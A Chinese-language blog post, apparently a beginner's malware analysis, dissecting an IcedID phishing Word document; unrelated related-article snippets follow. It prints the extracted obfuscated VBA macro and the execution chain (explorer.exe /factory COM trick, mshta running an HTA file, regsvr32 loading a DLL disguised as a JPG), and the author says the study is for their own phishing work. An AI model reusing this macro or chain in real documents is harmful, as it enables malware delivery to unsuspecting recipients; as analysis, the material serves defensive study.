IcedID恶意文档钓鱼手法剖析
析
利用oletools静态分析,提取宏代码,如图:

Function contents()
With ActiveDocument.Content.Find
loveDoor = .Execute(FindText:="%1", ReplaceWith:="", Replace:=2)
End With
End Function
Function text1(powGirlLoad)
text1 = ActiveDocument.BuiltInDocumentProperties(powGirlLoad).Value
contents
End Function
Public Function s(dowGirlLoad, tubeGirlPow)
GetObject("", text1("category")).exec StrReverse(" rerolpxe\swodniw\:c") + tubeGirlPow
End Function
注:oletools详细使用教程请转
文档内容肉眼看上去是空白的,但是全选拖出来如下:

通过宏代码处理文档内容,得到hta文件:

另启动一个 Explorer.exe(防止崩溃影响程序活动)后台隐藏插入com功能组件,方便dll执行的同时调用mshta.exe执行hta文件
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding //有无逗号,区别很好,自行测试
"C:\Windows\System32\mshta.exe" C:\Users\admin\Documents\karolYouYou.hta

下载含payload的jpg文件(实质上是dll文件),执行payload
"C:\Windows\System32\regsvr32.exe" c:\users\public\youYou.jpg


样本:
https://app.any.run/tasks/add39d8b-342c-4e55-9b37-3e3379fce030/
参考资料:
https://zeronohacker.com/398.html
https://www.cnblogs.com/liaocheng/p/4506406.html
https://www.cnblogs.com/yx-zs/p/14338291.html
https://zho.bizadcharityrun.com/434451-explorer-exe-starts-every-five-WQFOTF-article
https://blog.csdn.net/userpass_word/article/details/84307126
https://blog.csdn.net/weixin_44493841/article/details/106645360
ps:萌新分析APT攻击手法,用于自身钓鱼作业,请大佬轻喷,欢迎各位蓝队交流指点 QAQ
IcedID恶意文档钓鱼手法剖析的更多相关文章
- 接口文档API、剖析http协议, 原生http请求函数
http协议:超广本传输协议 特点: 短连接 请求完成后就断开 无状态 对于事务处理无记忆能力 媒体独立 客户端要指定适合的传输内容类型,如json http 是建立在tcp/ip协议之上的应用层 ...
- epub-2格式电子书剖析之一:文档构成
epub格式电子书遵循IDPF推出的OCF规范,OCF规范遵循ZIP压缩技术,即epub电子书本身就是一个ZIP文件,我们将epub格式电子书的后缀.epub修改为.zip后,可以通过解压缩软件(例如 ...
- 恶意PDF文档分析记录
0x1 PDF是什么 PDF(便携式文件格式,Portable Document Format)是由Adobe Systems在1993年用於文件交换所发展出的文件格式. 因为PDF的文件格式性质广泛 ...
- HTML5实战与剖析之跨文档消息传递(iframe传递信息)
在来自不同域名的页面间传递消息一般统称为跨文档消息传送,简称XDM.如,www.leemagnum.com域中的页面与位于一个内嵌框架中的http://blog.csdn.net/lee_magnum ...
- [转载]中情局数千份机密文档泄露:各种0day工具、恶意程序应有尽有
转载:http://www.freebuf.com/news/128802.html 维基解密最近再度获取到了数千份文件——据说这些文件是来自CIA(中央情报局),文件细数了CIA所用的网络入侵工具及 ...
- SpingMVC 核心技术帮助文档
声明:本篇文档主要是用于参考帮助文档,没有实例,但几乎包含了SpringMVC 4.2版本的所有核心技术,当前最新版本是4.3,4.2的版本已经经是很新的了,所以非常值得大家一读,对于读完这篇文档感觉 ...
- 网络电视精灵~分析~~~~~~简单工厂模式,继承和多态,解析XML文档,视频项目
小总结: 所用技术: 01.C/S架构,数据存储在XML文件中 02.简单工厂模式 03.继承和多态 04.解析XML文档技术 05.深入剖析内存中数据的走向 06.TreeView控件的使用 核心: ...
- Markdown: 用写代码的思维写文档
作者:吴香伟 发表于 2014/08/07 版权声明:可以任意转载,转载时务必以超链接形式标明文章原始出处和作者信息以及版权声明 本文不讲解Markdown的语法规则,只关注它带来的好处以及我使用的方 ...
- HTML5的文档结构和新增标签
一.HTML5 文档结构1.第一步:打开 开发工具,打开指定文件夹:2.第二步:保存 index.html 文件到磁盘中,.html 是网页后缀:3.第三步:开始编写 HTML5 的基本格式.< ...
- javascrit2.0完全参考手册(第二版) 第1章第1节 在XHTML文档中增加javascript
通常,向文档中增加script脚本使用<script>元素,在HTML中增加脚本的方式有4中: (1)放到<script></script>块中: (2)<s ...
随机推荐
- 【PWN】初见BROP
前言|与BROP的相遇 第一次BROP,它让我觉得pwn,或者说网安很妙,也很折磨 在遇到它之前,之前接触的题目都是简单的栈溢出,感觉没有啥有趣的,很简单,找gadget溢出就可以,一切都看得见 可遇 ...
- 在k8s上安装Harbor
在k8s上安装Harbor 先前条件 <kubernetes(k8s) 存储动态挂载><在k8s(kubernetes)上安装 ingress V1.1.3> 参考我之前的文档 ...
- pandas之统计函数
Pandas 的本质是统计学原理在计算机领域的一种应用实现,通过编程的方式达到分析.描述数据的目的.而统计函数则是统计学中用于计算和分析数据的一种工具.在数据分析的过程中,使用统计函数有助于我们理解和 ...
- 逍遥自在学C语言 | 位运算符&的高级用法
前言 在上一篇文章中,我们介绍了&运算符的基础用法,本篇文章,我们将介绍& 运算符的一些高级用法. 一.人物简介 第一位闪亮登场,有请今后会一直教我们C语言的老师 -- 自在. 第二位 ...
- GPT-4:思考的曙光还是数据的缩影?
海盗分金,GPT-4初露锋芒 GPT系列模型横空出世后,其是否真实具有思考和推理的能力一直被业界关注.GPT-3.5在多条狗问题和海盗分金问题上表现糟糕.GPT-4在这两个谜题上给出的答案令人惊喜,甚 ...
- 论文解读(PAWS)《Semi-Supervised Learning of Visual Features by Non-Parametrically Predicting View Assignments with Support Samples》
论文信息 论文标题:Semi-Supervised Learning of Visual Features by Non-Parametrically Predicting View Assignme ...
- 一个基于Java线程池管理的开源框架Hippo4j实践
@ 目录 概述 定义 线程池痛点 功能 框架概览 架构 部署 Docker安装 二进制安装 运行模式 依赖配置中心 接入流程 个性化配置 线程池监控 无中间件依赖 接入流程 服务端配置 三方框架线程池 ...
- Jmeter-测试报告模板分享
1.jmeter-results-detail-report_21 <?xml version="1.0"?> <!-- ~ Licensed to the Ap ...
- vue处理图片路径出问题时显示默认图片
<img :src="item.url? item.url: '' " alt :onerror="defaultImg" /> 这里一定要判断sr ...
- redis内存突然暴增,排查思路是什么
1 这种暴增的应该还是上次一个群友说的,更多可能是外部因素导致的,应用新上线,定时任务这些,再有就是cat上查是哪些指令多,以及比对和之前的时间的差异 看是否有定时任务 或者 新上线的活动 ,在看下监 ...